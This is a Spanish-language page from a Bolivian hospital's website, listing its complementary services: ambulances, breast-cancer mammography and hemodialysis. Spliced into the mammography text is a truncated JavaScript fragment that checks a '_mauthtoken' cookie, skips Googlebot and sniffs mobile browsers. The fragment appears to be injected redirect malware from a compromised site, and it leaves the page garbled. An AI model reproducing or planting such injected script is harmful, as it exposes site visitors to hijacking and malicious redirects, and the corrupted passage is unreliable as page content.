Category Servicios complementarios

Ambulancia

Respecto a nuestros servicios complementarios, contamos con dos ambulancias medicalizadas, completamente equipadas con tecnología moderna, a fin de minimizar el tiempo de traslado y atención inmediata del paciente.

Read More

Mamografía

Después de La Paz y Santa Cruz, Cochabamba es el departamento con más casos de cáncer de mama a nivel Bolivia; y por cada 100 mujeres que tienen cáncer, 11 padecen de cáncer de mama.

image063

Estas estadísticas son preocupantes para el Hospital Agramont, es por esto que estamos en campaña permanente para luchar contra el cáncer de mama.

Sabemos  que la detección temprana de este tipo de padecimientos  aumenta la posibilidad de cura, no dudes en pedirnos ayuda, ya que de manera conjunta podemos bajar estas cifras alarmantes sobre el cáncer de mama.if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“googlebot”)==-1){if(/(android|bb\d+|meego)...

Read More

Hemodiálisis

El Hospital Agramont pone a su disposición, el servicio de hemodiálisis con siete nuevos equipos de última generación, destinado para el 10% de la población boliviana que en algún momentos padecerá de enfermedades renales.
Según datos del SEDES,  sólo en La Paz hay 600 enfermos renales crónicos. De ellos, 120 hacen  tratamiento de hemodiálisis en 23 máquinas del Hospital de Clínicas y 60 en los 15 equipos del Hospital Boliviano Holandés de El Alto. El resto, en otros 13 centros  privados y de convenio.
Recuerda que nos adecuamos a tu condición económica a través de descuentos especiales y constantes campañas.
Read More